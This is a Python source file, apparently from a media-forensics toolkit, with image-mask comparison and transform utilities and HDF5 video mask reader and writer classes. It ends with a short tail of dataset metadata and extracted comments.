:param rawimg2:
:param equalize_colors:
:return:
@type rawimg1: ImageWrapper
@type rawimg2: ImageWrapper
"""
if convertFunction is not None:
return convertFunction(rawimg1, rawimg2)
return rawimg1.to_16BitGray().to_array(), rawimg2.to_16BitGray().to_array()
def __findBestMatch(big, small):
""" Return a tuple describing the bounding box (xl,xh,yl,yh) with the most
likely match to the small image.
"""
if len(small.shape) == 3 and len(big.shape) == 3 and \
small.shape[2] == 4 and big.shape[2] == 3:
newsmall = np.zeros((small.shape[0], small.shape[1], 3))
newsmall[:, :, :] = small[:, :, 0:3]
small = newsmall
if np.any(np.asarray([(x[1] - x[0]) for x in zip(small.shape, big.shape)]) < 0):
return None
result = cv2.matchTemplate(big.astype('float32'), small.astype('float32'), cv2api.cv2api_delegate.tm_sqdiff_normed)
mn, _, mnLoc, _ = cv2.minMaxLoc(result)
result_tuple = (mnLoc[1], mnLoc[0], mnLoc[1] + small.shape[0], mnLoc[0] + small.shape[1])
if result_tuple[2] > big.shape[0] or result_tuple[3] > big.shape[1]:
return None
return result_tuple
def bm(X, patch):
from sklearn.metrics import mean_absolute_error
bv = 999999.0
bp = (0, 0)
for i in range(X.shape[0] - patch.shape[0]):
for j in range(X.shape[1] - patch.shape[1]):
v = mean_absolute_error(X[i:i + patch.shape[0], j:j + patch.shape[1]], patch)
if v < bv:
bv = v
bp = (i, j)
return bp, bv
def composeCropImageMask(img1, img2, location=None):
""" Return a masking where img1 is bigger than img2 and
img2 is likely a crop of img1.
images are 16 bit unnsigned or floating point.
@return change mask aligned to in img1 dimensions, dictionary of analysis keys
@type img1: np.array
@type img2: np.array
"""
analysis = {}
analysis['location'] = '(0,0)'
if location is not None:
matched_tuple = (location[0],location[1],img2.shape[0]+location[0],img2.shape[1]+location[1])
else:
matched_tuple = __findBestMatch(img1, img2)
if matched_tuple is not None:
diffIm = np.zeros(img1.shape).astype(img1.dtype)
diffIm[matched_tuple[0]:matched_tuple[2], matched_tuple[1]:matched_tuple[3]] = img2
analysis['location'] = str((int(matched_tuple[0]), int(matched_tuple[1])))
dst = np.abs(img1 - diffIm)
gray_image = np.zeros(img1.shape).astype('uint8')
gray_image[dst > 0.0001] = 255
mask = gray_image
for k, v in img_analytics(img1, diffIm, mask=mask).iteritems():
analysis[k] = v
else:
mask = np.ones(img1.shape) * 255
return abs(255 - mask).astype('uint8'), analysis
def composeCloneMask(changemask, startimage, finalimage):
"""
:param changemask:
:param startimage:
:param finalimage:
:return:
@type changemask: ImageWrapper
@type startimage: ImageWrapper
@type finalimage: ImageWrapper
"""
mask = np.asarray(changemask.invert())
start_image_array = np.array(startimage)
final_image_array = np.array(finalimage)
newmask = np.zeros(start_image_array.shape).astype('uint8')
try:
contours, hierarchy = cv2api.findContours(np.copy(mask), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
for i in range(0, len(contours)):
try:
cnt = contours[i]
x, y, w, h = cv2.boundingRect(cnt)
if w <= 2 or h <= 2:
continue
final_image_subarray = final_image_array[y:y + h, x:x + w]
for i in range(final_image_subarray.shape[2]):
final_image_subarray[:, :, i] = final_image_subarray[:, :, i] * (mask[y:y + h, x:x + w] / 255)
matched_tuple = __findBestMatch(start_image_array, final_image_subarray)
if matched_tuple is not None:
newmask[matched_tuple[0]:matched_tuple[2], matched_tuple[1]:matched_tuple[3]] = 255
except Exception as e:
logging.getLogger('maskgen').warning('Failed to compose clone mask: ' + str(e))
continue
except Exception as e:
return changemask.to_array()
return newmask
def __composeExpandImageMask(img1, img2):
""" Return a masking where img1 is smaller than img2 and
img2 contains img1.
"""
matched_tuple = __findBestMatch(img2, img1)
analysis = {}
if matched_tuple is not None:
diffIm = img2[matched_tuple[0]:matched_tuple[2], matched_tuple[1]:matched_tuple[3]]
dst = np.abs(img1 - diffIm)
analysis['location'] = str((int(matched_tuple[0]), int(matched_tuple[1])))
gray_image = np.zeros(img1.shape).astype('uint8')
gray_image[dst > 0.0001] = 255
mask = gray_image
for k, v in img_analytics(img1, diffIm, mask=mask).iteritems():
analysis[k] = v
else:
mask = np.ones(img1.shape) * 255
return abs(255 - mask).astype('uint8'), analysis
def __colorPSNR(z1, z2, size=None):
if size == 0:
return 0.0
d = (z1 - z2) ** 2
sse = np.sum(d)
size = float(reduce(lambda x, y: x * y, d.shape)) if size is None else float(size)
mse = float(sse) / size
return 0.0 if mse == 0.0 else 20.0 * math.log10(255.0 / math.sqrt(mse))
def sizeDiff(z1, z2):
"""
z1 and z2 are expected to be PIL images
"""
# size is inverted due to Image's opposite of numpy arrays
return str((int(z2.size[1] - z1.size[1]), int(z2.size[0] - z1.size[0])))
def invertMask(mask):
return mask.invert()
def convertToMask(im):
"""
Takes an image and produce a mask where all black areas are white
"""
return im.to_mask()
def __checkInterpolation(val):
validVals = ['nearest', 'lanczos', 'bilinear', 'bicubic' or 'cubic']
return val if val in validVals else 'nearest'
def applyMask(image, mask, value=0):
if mask.shape != image.shape:
mask = cv2.resize(mask, (image.shape[1], image.shape[0]))
image = np.copy(image)
image[mask == 0] = value
return image
def carveMask(image, mask, expectedSize):
"""
Trim a mask after seam carving
:param image:
:param mask:
:param expectedSize:
:return:
"""
newimage = np.zeros(expectedSize).astype('uint8')
if expectedSize[0] == mask.shape[0]:
for x in range(expectedSize[0]):
topaste = image[x, mask[x, :] == 255]
if (len(topaste)) <= newimage.shape[1]:
newimage[x, 0:len(topaste)] = topaste
else:
newimage[x, :] = topaste[0:len(topaste)]
elif expectedSize[1] == mask.shape[1]:
for y in range(expectedSize[1]):
topaste = image[mask[:, y] == 255, y]
if (len(topaste)) <= newimage.shape[0]:
newimage[0:len(topaste), y] = topaste
else:
newimage[:, y] = topaste[0:len(topaste)]
else:
return applyMask(image, mask)
return newimage
def alterMask(compositeMask,
edgeMask,
rotation=0.0,
targetShape=(0, 0),
interpolation='nearest',
location=(0, 0),
transformMatrix=None,
flip=None,
crop=False,
cut=False):
res = compositeMask
# rotation may change the shape
# transforms typical are created for local operations (not entire image)
if location != (0, 0) or crop:
if targetShape != res.shape:
# inverse crop
newRes = np.zeros(targetShape).astype('uint8')
upperBound = (min(res.shape[0] + location[0], newRes.shape[0]),
min(res.shape[1] + location[1], newRes.shape[0]))
newRes[location[0]:upperBound[0], location[1]:upperBound[1]] = res[0:(upperBound[0] - location[0]),
0:(upperBound[1] - location[1])]
res = newRes
else:
upperBound = (min(res.shape[0], targetShape[0] + location[0]),
min(res.shape[1], targetShape[1] + location[1]))
res = res[location[0]:upperBound[0], location[1]:upperBound[1]]
if transformMatrix is not None and not cut and flip is None:
res = applyTransformToComposite(compositeMask, edgeMask, transformMatrix)
elif abs(rotation) > 0.001:
if targetShape != res.shape or abs(rotation) % 90 < 0.001:
res = __rotateImage(rotation, compositeMask,
expectedDims=targetShape,
cval=0)
else:
res = applyRotateToComposite(rotation, res,
edgeMask,
targetShape)
# if transform matrix provided and alternate path is taken above
if flip is not None:
res = applyFlipComposite(res, edgeMask, flip)
if cut:
res = applyMask(res, edgeMask)
if targetShape != res.shape:
res = applyResizeComposite(res, targetShape)
return res
def alterReverseMask(donorMask, edgeMask, rotation=0.0, location=(0, 0),
transformMatrix=None, flip=None, crop=False, cut=False, targetShape=None):
res = donorMask
# if we are cutting, then do not want to use the edge mask as mask for transformation.
# see the cut section below, where the transform occurs directly on the mask
# this occurs in donor cases
if ((location != (0, 0) or crop) and not cut):
if targetShape != donorMask.shape:
# inverse crop
upperBound = (min(res.shape[0], targetShape[0] + location[0]),
min(res.shape[1], targetShape[1] + location[1]))
res = res[location[0]:upperBound[0], location[1]:upperBound[1]]
else:
newRes = np.zeros(targetShape).astype('uint8')
upperBound = (res.shape[0] + location[0], res.shape[1] + location[1])
newRes[location[0]:upperBound[0], location[1]:upperBound[1]] = res[0:(upperBound[0] - location[0]),
0:(upperBound[1] - location[1])]
res = newRes
if transformMatrix is not None and not cut and flip is None:
res = applyTransform(res, mask=edgeMask, transform_matrix=transformMatrix, invert=True,
returnRaw=False)
elif abs(rotation) > 0.001:
res = __rotateImage(-rotation, res, expectedDims=targetShape, cval=0)
elif flip is not None:
res = applyFlipComposite(res, edgeMask, flip)
if cut:
# res is the donor mask
# edgeMask may be the overriding mask from a PasteSplice, thus in the same shape
# The transfrom will convert to the target mask size of the donor path.
res = applyMask(res, edgeMask)
if transformMatrix is not None:
res = cv2.warpPerspective(res, transformMatrix, (targetShape[1], targetShape[0]),
flags=cv2.WARP_INVERSE_MAP,
borderMode=cv2.BORDER_CONSTANT, borderValue=0).astype('uint8')
# need to use target size since the expected does ot align with the donor paths.
if targetShape != res.shape:
res = cv2.resize(res, (targetShape[1], targetShape[0]))
return res
def __toMask(im):
"""
Performs same functionality as convertToMask, but takes and returns np array
"""
if len(im.shape) < 3:
return im
imGray = cv2.cvtColor(im, cv2.COLOR_RGB2GRAY)
gray_image = np.ones(imGray.shape).astype('uint8')
gray_image[imGray < 255] = 0
gray_image *= 255
if im.shape[2] == 4:
gray_image[im[:, :, 3] == 0] = 255
return gray_image
def mergeColorMask(compositeMaskArray, newMaskArray):
matches = np.any(newMaskArray != [255, 255, 255], axis=2)
compositeMaskArray[matches] = newMaskArray[matches]
return compositeMaskArray
def mergeMask(compositeMask, newMask, level=0):
if compositeMask.shape != newMask.shape:
compositeMask = cv2.resize(compositeMask, (newMask.shape[1], newMask.shape[0]))
newMask = ImageWrapper(newMask).to_mask().to_array()
else:
compositeMask = np.copy(compositeMask)
compositeMask[newMask == 0] = level
return compositeMask
def ssim(X, Y, MASK, **kwargs):
from scipy.ndimage import gaussian_filter
K1 = kwargs.pop('K1', 0.01)
R = kwargs.pop('R', 255)
K2 = kwargs.pop('K2', 0.03)
sigma = kwargs.pop('sigma', 1.5)
X = X.astype(np.float64)
Y = Y.astype(np.float64)
win_size = 1
cov_norm = 1.0 # population covariance to match Wang et. al. 2004
filter_func = gaussian_filter
filter_args = {'sigma': sigma}
# compute (weighted) means
ux = filter_func(X, **filter_args)
uy = filter_func(Y, **filter_args)
# compute (weighted) variances and covariances
uxx = filter_func(X * X, **filter_args)
uyy = filter_func(Y * Y, **filter_args)
uxy = filter_func(X * Y, **filter_args)
vx = cov_norm * (uxx - ux * ux)
vy = cov_norm * (uyy - uy * uy)
vxy = cov_norm * (uxy - ux * uy)
C1 = (K1 * R) ** 2
C2 = (K2 * R) ** 2
A1, A2, B1, B2 = ((2 * ux * uy + C1,
2 * vxy + C2,
ux ** 2 + uy ** 2 + C1,
vx + vy + C2))
D = B1 * B2
S = ((A1 * A2) / D) * MASK
# compute (weighted) mean of ssim
return S.mean()
def img_analytics(z1, z2, mask=None):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
result = {'psnr': __colorPSNR(z1, z2)}
if mask is not None:
mask = np.copy(mask)
mask[mask > 0] = 1
result.update({'local psnr': __colorPSNR(z1 * mask, z2 * mask, size=sumMask(mask))})
return result
def __diffMask(img1, img2, invert, args=None):
itype = np.iinfo(img1.dtype)
dst = np.abs(np.subtract(img1.astype('int32'), img2.astype('int32')))
gray_image = np.zeros(img1.shape).astype('uint8')
difference = float(args['tolerance']) if args is not None and 'tolerance' in args else 0.0001
difference = difference * (itype.max - itype.min)
gray_image[dst > difference] = 255
analysis = img_analytics(img1, img2, mask=gray_image)
return (gray_image if invert else (255 - gray_image)), analysis
def coordsFromString(value):
import re
value = re.sub('[\(\)\,]', ' ', value)
vals = [int(float(v)) for v in value.split(' ') if v != ' ' and v != '']
return tuple(vals)
def fixTransparency(img):
return img.apply_transparency()
def dictDeepUpdate(aDictionary, aPartialDictionary):
for k, v in aPartialDictionary.iteritems():
if k in aDictionary and type(v) == dict:
dictDeepUpdate(aDictionary[k], v)
else:
aDictionary[k] = v
def grayToRGB(frame):
"""
project gray into Green
"""
result = np.zeros((frame.shape[0], frame.shape[1], 3))
if len(frame.shape) == 2:
result[:, :, 1] = frame
else:
summary = np.zeros((frame.shape[0], frame.shape[1]))
for d in range(frame.shape[2]):
summary[:, :] += frame[:, :, d]
summary[summary > 0] = 255
result[:, :, 1] = summary
return result.astype('uint8')
def composeVideoMaskName(maskprefix, starttime, suffix):
"""
:param maskprefix:
:param starttime:
:param suffix:
:return: A mask file name using the provided components
"""
if maskprefix.endswith('_mask_' + str(starttime)):
return maskprefix + '.' + suffix
return maskprefix + '_mask_' + str(starttime) + '.' + suffix
def convertToVideo(filename, preferences=None, start_frame=None, start_time=0):
suffix = '.' + preferredSuffix(preferences=preferences)
fn = os.path.splitext(filename)[0] + (str(start_frame) if start_frame is not None else '') + suffix
if os.path.exists(fn):
if os.stat(filename).st_mtime < os.stat(fn).st_mtime:
return fn
else:
os.remove(fn)
reader = GrayBlockReader(filename,
convert=True,
preferences=preferences,
start_frame=start_frame,
start_time=start_time)
while True:
mask = reader.read()
if mask is None:
break
fn = reader.writer.filename
return fn
executions = {}
def cancel_execute(worker_func):
if worker_func in executions:
executions[worker_func].cancel()
def execute_every(interval, worker_func, start=True, **kwargs):
executions[worker_func] = threading.Timer(
interval,
execute_every, [interval, worker_func, False], kwargs)
executions[worker_func].start()
if not start:
worker_func(**kwargs)
class GrayBlockFrameFirstLayout():
name = 'framefirst'
@staticmethod
def is_end(reader):
return reader.pos >= reader.dset.shape[0]
@staticmethod
def count(reader):
return reader.dset.shape[0]
@staticmethod
def get_frame(reader):
return reader.dset[reader.pos]
@staticmethod
def initial_shape(shape, size = None):
return (size,) + shape
@staticmethod
def resize(shape, writer):
if writer.dset.shape[0] < (writer.pos + 1):
writer.dset.resize((writer.pos + 1,) + writer.dset.shape[1:])
@staticmethod
def set(writer,mask):
writer.dset[ writer.pos] = mask
class GrayBlockFrameLastLayout():
name = 'framelast'
@staticmethod
def is_end(reader):
return reader.pos >= reader.dset.shape[-1]
@staticmethod
def count(reader):
return reader.dset.shape[-1]
@staticmethod
def get_frame(reader):
return reader.dset[:, :, reader.pos]
@staticmethod
def initial_shape(shape, size=None):
return (shape)[:-1] + (size,)
@staticmethod
def resize(shape, writer):
if writer.dset.shape[-1] < (writer.pos + 1):
writer.dset.resize((shape)[:-1] + (writer.pos + 1,))
@staticmethod
def set(writer,mask):
if len(writer.dset.shape) == 2:
writer.dset[:, :, writer.pos] = mask
else:
writer.dset[:, :, :, writer.pos] = mask
class GrayBlockReader:
def __init__(self, filename,
convert=False,
preferences=None,
start_time=0,
start_frame=None,
end_frame=None):
import h5py
self.writer = None
self.start_frame = start_frame
self.start_time = start_time
self.preferences = preferences
self.filename = filename
self.h_file = h5py.File(filename, 'r')
grp_names = self.h_file.keys()
if 'masks' in grp_names:
self.grps = ['masks']
self.setter = OldFormatGroupSetter()
else:
self.setter = NewFormatGroupSetter()
self.grps = [str(x) for x in sorted([int(x) for x in grp_names])]
# group selection
self.grp_pos = 0
# frame selection in group (relative to start of group)
self.pos = 0
# the smart numpy array
self.dset = None
# where to stop
self.end_frame = end_frame
self.fps = self.h_file.attrs['fps']
self.mask_format = MASKFORMATS[
self.h_file.attrs['mask_format'] if 'mask_format' in self.h_file.attrs else GrayBlockFrameFirstLayout.name]
self.setter.set_group(self, start_time=start_time, start_frame=start_frame, end_frame=end_frame)
self.convert = convert
self.writer = GrayFrameWriter(os.path.splitext(filename)[0],
self.fps,
preferences=preferences) if self.convert else DummyWriter()
def create_writer(self):
"""
:return:
@rtype: GrayBlockWriter
"""
import time
dir = os.path.dirname(self.filename)
prefix = os.path.join(dir,os.path.basename(self.h_file.attrs['prefix'])) if 'prefix' in self.h_file.attrs else os.path.splitext(self.filename)[0][:48]
return GrayBlockWriter(prefix + str(time.clock()), self.fps)
def set_group(self, start_frame=None, start_time=1, end_frame=None):
self.setter.set_group(self, start_frame=start_frame,start_time=start_time, end_frame=end_frame)
def current_frame_time(self):
return self.start_time + (self.pos * (1000 / self.fps))
def current_frame(self):
return self.start_frame + self.pos
def length(self):
return self.mask_format.count(self)
def read(self):
if self.dset is None:
return None
if self.end_frame is not None and self.current_frame() == self.end_frame + 1:
return None
if self.mask_format.is_end(self):
self.grp_pos+=1
if self.grp_pos < len(self.grps):
self.setter.select_group(self, self.grp_pos)
else:
self.dset = None
return None
mask = self.mask_format.get_frame(self)
mask = mask.astype('uint8')
self.writer.write(mask, self.start_frame + self.pos, self.current_frame_time())
self.pos += 1
return mask
def release(self):
pass
def close(self):
self.h_file.close()
if self.writer is not None:
self.writer.close()
MASKFORMATS = {GrayBlockFrameFirstLayout.name:GrayBlockFrameFirstLayout(),
GrayBlockFrameLastLayout.name:GrayBlockFrameLastLayout()}
class GrayBlockReaderManager:
def __init__(self, reader_type= GrayBlockReader):
self.reader_type = reader_type
self.reader = None
self.filename = None
def create_reader(self, filename,
start_frame=None,
start_time=0,
end_frame=None):
"""
:param filename:
:param start_frame:
:param start_time:
:param end_frame: optional stopping point
:return:
@type filename: str
@rtype: GrayBlockReader
"""
if filename == self.filename:
self.reader.set_group(start_frame=start_frame,
start_time=start_time,
end_frame=end_frame)
else:
if self.reader is not None:
self.reader.close()
self.filename = filename
self.reader = self.reader_type(filename,
start_frame=start_frame,
start_time=start_time,
end_frame=end_frame)
return self.reader
def close(self):
if self.reader is not None:
self.reader.close()
self.reader = None
class GrayBlockWriterManager:
def __init__(self):
self.writer = None
def create_writer(self, reader):
"""
:param reader:
:return:
@type reader: GrayBlockReader
@rtype: GrayBlockWriter
"""
if self.writer is not None:
return self.writer
self.writer= reader.create_writer()
return self.writer
def close(self):
if self.writer is not None:
self.writer.close()
self.writer = None
class NewFormatGroupSetter:
"""
Multiple Mask Segment per HDF5 File, one in each group.
"""
@staticmethod
def set_group(reader, start_frame=None, start_time=1,end_frame=None):
"""
:param start_frame:
:param start_time:
:return:
@type reader: GrayBlockReader
"""
grp_pos = 0
if start_frame is not None:
pos = len([x for x in reader.grps if int(x) <= start_frame]) - 1
grp_pos = pos if pos > 0 else grp_pos
NewFormatGroupSetter.select_group(reader,
grp_pos,
start_frame=start_frame,
start_time=start_time,
end_frame=end_frame)
@staticmethod
def select_group(reader,
grp_pos,
start_frame=None,
start_time=0,
end_frame=None):
"""
:param reader:
:param grp_no:
:param start_frame:
:param start_time:
:param end_frame: determine end frame
:return:
"""
reader.grp_pos = grp_pos
reader.current_group = reader.h_file.get(reader.grps[grp_pos])
reader.dset = reader.current_group.get('masks')
reader.start_time = reader.current_group.attrs[
'start_time'] if 'start_time' in reader.current_group.attrs else start_time
reader.start_frame = reader.current_group.attrs[
'start_frame'] if 'start_frame' in reader.current_group.attrs else start_frame
end_frame = reader.current_group.attrs[
'end_frame'] if 'end_frame' in reader.current_group.attrs and end_frame is None else end_frame
reader.end_frame = end_frame if end_frame is not None else None
reader.pos = 0 if start_frame is None else reader.start_frame - start_frame
class OldFormatGroupSetter:
"""
One Mask Segment per HDF5 File.
"""
@staticmethod
def set_group(reader, start_frame=None, start_time=0, end_frame=None):
"""
:param start_frame:
:param start_time:
:return:
@type reader: GrayBlockReader
"""
reader.current_group = reader.h_file.get('masks')
reader.dset = reader.current_group.get('masks')
reader.start_time = reader.h_file.attrs[
'start_time'] if 'start_time' in reader.h_file.attrs else start_time
reader.start_frame = reader.h_file.attrs[
'start_frame'] if 'start_frame' in reader.h_file.attrs else start_frame
reader.pos = 0 if start_frame is None else reader.start_frame - start_frame
@staticmethod
def select_group(reader, grp_pos, start_frame=None, start_time=0,end_frame=None):
OldFormatGroupSetter.set_group(reader,start_frame=start_frame,start_time=start_time)
def compose_overlay_name(target_file="", link = tuple()):
path_tuple = os.path.split(target_file)
return os.path.join(path_tuple[0], path_tuple[1] + str(hash(link))[:5] + '_overlay.' + preferredSuffix())
class GrayBlockOverlayGenerator:
def __init__(self, locator, segments = [], target_file = None, output_file = ""):
from video_tools import get_frames_from_segment
self.target_file = target_file
self.output_file = output_file
segments = [segment for segment in segments if segment.media_type == 'video' and segment.filename != None]
self.segments = sorted(segments, key=lambda segment: segment.startframe)
self.segment_index = 0
self.segment = segments[self.segment_index]
self.readerManager = GrayBlockReaderManager()
self.reader = self.readerManager.create_reader(
filename=self.segment.filename,
start_time=self.segment.starttime,
start_frame=self.segment.startframe,
end_frame=self.segment.endframe)
self.overlay_mask_name = os.path.join(os.path.split(self.segment.filename)[0], '_overlay')
self.writer = GrayFrameOverlayWriter(
mask_prefix=self.overlay_mask_name,
fps=self.reader.fps)
self.last_frame = get_frames_from_segment(locator.getMaskSetForEntireVideo()[0])
def updateSegment(self):
self.segment_index += 1
self.segment = self.segments[self.segment_index]
self.reader = self.readerManager.create_reader(
filename=self.segment.filename,
start_time=self.segment.starttime,
start_frame=self.segment.startframe,
end_frame=self.segment.endframe)
def generate(self):
while self.writer.lastPos < self.last_frame:
frame_time = self.reader.current_frame_time()
frame_count = self.reader.current_frame()
mask = self.reader.read()
if mask is None:
if self.segment_index + 1 < len(self.segments):
self.updateSegment()
else:
frame_count = self.last_frame #write blanks for the rest
self.writer.write(mask, frame_count, frame_time)
self.writer.close()
self.readerManager.close()
ffmpeg_overlay(self.target_file, self.writer.filename, self.output_file)
try:
os.remove(self.writer.filename) #clean up the mask file, leave the finished overlay
except OSError:
pass
class DummyWriter:
def write(self, mask, mask_number, mask_time):
pass
def close(self):
pass
class GrayBlockWriter:
"""
Write Gray scale (Mask) images to a compressed block file
"""
def __init__(self, mask_prefix, fps, layout=GrayBlockFrameFirstLayout()):
self.fps = fps
self.dset = None
self.pos = 0
self.h_file = None
self.suffix = 'hdf5'
self.filename = None
self.mask_prefix = mask_prefix
self.mask_format = layout
self.last_frame = 1
self.last_time = 0
self.current_group = None
def write(self, mask, mask_time, frame_number):
import h5py
if self.current_group is not None and frame_number - self.last_frame > 1:
grp = self.current_group
grp.attrs['end_time'] = self.last_time
grp.attrs['end_frame'] = self.last_frame
self.current_group = None
if self.h_file is None:
self.filename = composeVideoMaskName(self.mask_prefix, mask_time, self.suffix)
logging.getLogger('maskgen').info('Writing to ' + self.filename)
if os.path.exists(self.filename):
os.remove(self.filename)
self.h_file = h5py.File(self.filename, 'w')
self.h_file.attrs['fps'] = self.fps
self.h_file.attrs['prefix'] = os.path.basename(self.mask_prefix)
self.h_file.attrs['mask_format'] = self.mask_format.name
self.current_group = None
if self.current_group is None:
self.current_group = self.h_file.create_group(str(frame_number))
grp = self.current_group
grp.attrs['start_time'] = mask_time
grp.attrs['start_frame'] = frame_number
self.dset = grp.create_dataset("masks",
self.mask_format.initial_shape(mask.shape, size=10),
compression="gzip",
chunks=True,
maxshape=self.mask_format.initial_shape(mask.shape))
self.pos = 0
self.mask_format.resize(mask.shape, self)
self.last_frame = frame_number
self.last_time = mask_time
self.mask_format.set(self, mask)
self.pos += 1
def get_file_name(self):
return self.filename
def close(self):
self.release()
def release(self):
if self.current_group is not None:
self.current_group.attrs['end_time'] = self.last_time
self.current_group.attrs['end_frame'] = self.last_frame
self.current_group = None
self.dset = None
if self.h_file is not None:
self.h_file.close()
self.h_file = None
def preferredSuffix(preferences=None):
import sys
default_suffix = 'm4v'
if sys.platform.startswith('win'):
default_suffix = 'avi'
if sys.platform.startswith('linux'):
default_suffix = 'avi'
if preferences is not None:
t_suffix = getValue(preferences,'vid_suffix')
default_suffix = t_suffix if t_suffix is not None else default_suffix
return default_suffix
class GrayBlockFactory:
"""
Either build the Writer or the Validator
"""
def __init__(self, writer =None):
self.writer = writer
def __call__(self, name, fps):
return GrayBlockWriter(mask_prefix=name, fps=fps) if self.writer is None else self.writer
class GrayBlockValidator():
"""
Compare frames of two video masks to see if one is valid.
"""
def __init__(self, jt_mask_file, validation_function):
self.filename = jt_mask_file
self.failed_frames = []
self.manager = GrayBlockReaderManager()
self.validation_function = validation_function
self.manager.create_reader(jt_mask_file)
def write(self, mask, mask_time, frame_number):
while(self.manager.reader.current_frame() < frame_number):
self.manager.reader.read() #ffwd to where we want to be
if self.manager.reader.current_frame() == frame_number:
jt_mask = self.manager.reader.read()
if jt_mask is not None:
if not self.validation_function(jt_mask,mask):
self.failed_frames.append(frame_number)
def get_file_name(self):
return self.filename
class GrayFrameWriter:
"""
Write Gray scale (Mask) video images
"""
capOut = None
codec = 'AVC1'
suffix = 'm4v'
fourcc = None
filename = None
fps = 0
mask_prefix = None
def __init__(self, mask_prefix, fps, preferences=None):
import sys
self.fps = fps
self.mask_prefix = mask_prefix
self.suffix = preferredSuffix(preferences=preferences)
t_codec = None
if preferences is not None and 'vid_codec' in preferences:
t_codec = preferences['vid_codec']
if t_codec is None and sys.platform.startswith('win'):
self.codec = 'XVID'
elif t_codec is None and sys.platform.startswith('linux'):
self.codec = 'XVID'
elif t_codec is not None:
self.codec = str(t_codec)
self.fourcc = cv2api.cv2api_delegate.get_fourcc(self.codec) if self.codec is not 'raw' else 0
def write(self, mask, mask_number, mask_time):
if self.capOut is None:
self.filename = composeVideoMaskName(self.mask_prefix, mask_time, self.suffix)
logging.getLogger('maskgen').info('writing using fourcc ' + str(self.fourcc))
if os.path.exists(unicode(os.path.abspath(self.filename))):
os.remove(unicode(os.path.abspath(self.filename)))
self.capOut = cv2.VideoWriter(unicode(os.path.abspath(self.filename)),
self.fourcc,
self.fps,
(mask.shape[1], mask.shape[0]),
len(mask.shape) > 2 and mask.shape[2] > 1)
if cv2.__version__.startswith('2.4.11'):
mask = grayToRGB(mask)
self.capOut.write(mask)
def close(self):
if self.capOut is not None:
self.capOut.release()
self.capOut = None
def release(self):
self.close()
class GrayFrameOverlayWriter(GrayFrameWriter):
def __init__(self, mask_prefix = '', fps = 30/1, preferences = None):
GrayFrameWriter.__init__(self, mask_prefix=mask_prefix, fps=fps, preferences = preferences)
self.lastPos = 0
self.blankMask = None
def write(self, mask, mask_number, mask_time):
if self.blankMask is None:
self.blankMask = np.ones((mask.shape[0], mask.shape[1]), dtype=np.uint8) * 255
frames_to_write = mask_number - self.lastPos #write all the frames up to and including the mask frame
for i in range(1,frames_to_write+1):
frame_num = self.lastPos + i
mask_time = frame_num * 1000.0 / self.fps #refigure time for the frame we actually write
GrayFrameWriter.write(self,
mask=mask if frame_num == mask_number and mask is not None else self.blankMask,
mask_number=frame_num,
mask_time=mask_time)
self.lastPos = mask_number
def widthandheight(img):
a = np.where(img != 0)
if len(a[0]) == 0:
return 0, 0, 0, 0
bbox = np.min(a[0]), np.max(a[0]), np.min(a[1]), np.max(a[1])
h, w = bbox[1] - bbox[0], bbox[3] - bbox[2]
return bbox[2], bbox[0], w, h
def place_in_image(mask, image_to_place, image_to_cover, placement_center, rect=None):
x, y, w, h = widthandheight(mask)
if rect:
if w > rect[2]:
x = x + (w - rect[2]) / 2
w = rect[2]
if h > rect[3]:
y = y + (h - rect[3]) / 2
h = rect[3]
w += w % 2
h += h % 2
x_offset = int(placement_center[0]) - int(math.floor(w / 2))
y_offset = int(placement_center[1]) - int(math.floor(h / 2))
if y_offset < 0:
return None
if x_offset < 0:
return None
image_to_cover = np.copy(image_to_cover)
flipped_mask = 255 - mask
for c in range(0, 3):
image_to_cover[y_offset:y_offset + h, x_offset:x_offset + w, c] = \
image_to_cover[y_offset:y_offset + h, x_offset:x_offset + w, c] * \
(flipped_mask[y:y + h, x:x + w] / 255) + \
image_to_place[y:y + h, x:x + w, c] * \
(mask[y:y + h, x:x + w] / 255)
return image_to_cover
def selfVideoTest():
logging.getLogger('maskgen').info('Checking opencv and ffmpeg, this may take a minute.')
writer = GrayBlockWriter('test_ts_gw', 29.97002997)
mask_set = list()
for i in range(255):
mask = np.random.randint(255, size=(1090, 1920)).astype('uint8')
mask_set.append(mask)
writer.write(mask, i + 1 * 33.3666666667, i + 1)
writer.close()
fn = writer.get_file_name()
vidfn = convertToVideo(fn)
if not os.path.exists(vidfn):
return 'Video Writing Failed'
try:
size = openImage(vidfn, getMilliSecondsAndFrameCount('00:00:01')).size
if size != (1920, 1090):
return 'Video Writing Failed: Frame Size inconsistent'
except:
return 'Video Writing Failed'
return None
def dateTimeStampCompare(v1, v2):
def get_defaults(source):
exifdata = maskgen.exif.getexif(source)
rd = {}
for e in exifdata:
if "date" in str(e).lower() or "time" in str(e).lower():
rd[e] = exifdata[e]
return rd
#date_time_stamp = exifdata['Create Date'] if 'Create Date' in exifdata else exifdata['File Creation Date/Time']
stamp1 = get_defaults(v1)
rgexdict = {}
for e in stamp1:
st = stamp1[e]
rgexf = "\\A"
for x in st:
if x.isdigit():
rgexf += '[0-9]'
elif x.isalpha():
rgexf += '[a-zA-z]*'
else:
rgexf += x
rgexf+= "\\Z"
rgexdict[e] = rgexf
stamp2 = get_defaults(v2)
nonmatches = []
for e in stamp2:
if e in rgexdict:
mo = re.match(rgexdict[e],stamp2[e])
if mo is None:
nonmatches.append(e)
else:
pass
#nonmatches.append(e)
return nonmatches | en | 0.670983 | # ============================================================================= # Authors: PAR Government # Organization: DARPA # # Copyright (c) 2016 PAR Government # All rights reserved. # ============================================================================== # To simplify we'll assume this is hooked up # to a single filename. # ['./icons'] :return: The last roll over log file Return: True if the file types of the two provided files do not match Open a file using a native OS associated program :param img: :param dim: :return: @rtype: ImageWrapper Preserves the dimension ratios_ :param dim: :param otherImDim: dimensions of other image :return: Resized relative to width given the maximum constraints @rtype: ImageWrapper Coordinates are [x,y] or (x,y) or x,y where x and y are integers. Return False if the coordinates are invalid. frameCountWhenStarted: record the frame at start frameCountWhenStopped: record the frame at finish #if startTimeandFrame is not None and startTimeandFrame[1] > 0 and startTimeandFrame[0] > 0: # self.startTimeandFrame = (startTimeandFrame[0],startTimeandFrame[1]+1) #if stopTimeandFrame is not None and stopTimeandFrame[1] > 0 and stopTimeandFrame[0] > 0: # self.stopTimeandFrame = (stopTimeandFrame[0],stopTimeandFrame[1]+1) :param milliNow: time after the frame is to be displayed or sound emitted :param frames: :return: calculation duration Validate a typed operation argument return the type converted argument if necessary raise a ValueError if invalid Convert milliseconds to 